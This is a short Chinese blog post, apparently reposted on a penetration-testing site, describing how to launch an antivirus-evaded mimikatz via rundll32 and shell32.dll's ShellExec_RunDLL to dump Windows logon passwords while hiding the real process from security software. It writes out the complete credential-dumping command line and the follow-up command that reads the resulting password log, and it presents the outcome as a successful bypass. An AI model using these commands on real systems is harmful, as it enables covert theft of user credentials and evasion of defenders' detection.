黑客测试:shell32.dll执行getpass

最近在做安全维持的时候看到的,找到的一位大佬的文章,受益匪浅  丢在自己博客上做一个统计

系统文件shell32.dll是存放在Windows\System32系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要
系统文件sshell32.dll是Windows的32位外壳动态链接库文件,用于打开网页和文件,建立文件时的默认文件名的设置等大量功能。它提供了explorer.exe的功能,比如”找开“,”运行程序“等,我们可以使用IDA打开这个DLL然后查看导出表。
黑客测试技术

先将免杀过后的mimikatz上传到目标机上,利用shell32的目的在于能够执行,绕过一些杀毒白名单之类的操作,再或者通用的cmd /c 方式可能会触发行为查杀拦截。

 

rundll32.exe shell32.dll,ShellExec_RunDLL c:\Users\mac\Desktop\a\a "log" "privilege::debug" "sekurlsa::logonPasswords full" "exit"
黑客测试技术

 

 

type c:\windows\system32\mimikatz.log
黑客测试技术

 

成功绕过,并查看到密码

黑客测试技术

就是被拦截也是没有显示出你的mimikatz执行的动态,显示的提醒是rundll32,和shell32.dll恶意执行。这样就隐藏了真实被执行的软件
黑客测试技术
如果您喜欢本篇文章,记得转发+关注哦
转载请注明蓝域黑客测试技术网本文链接:http://www.yemogege.cn/wzaq-stwz/374.html

 

版权保护: 本文由admin所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stwz/374.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图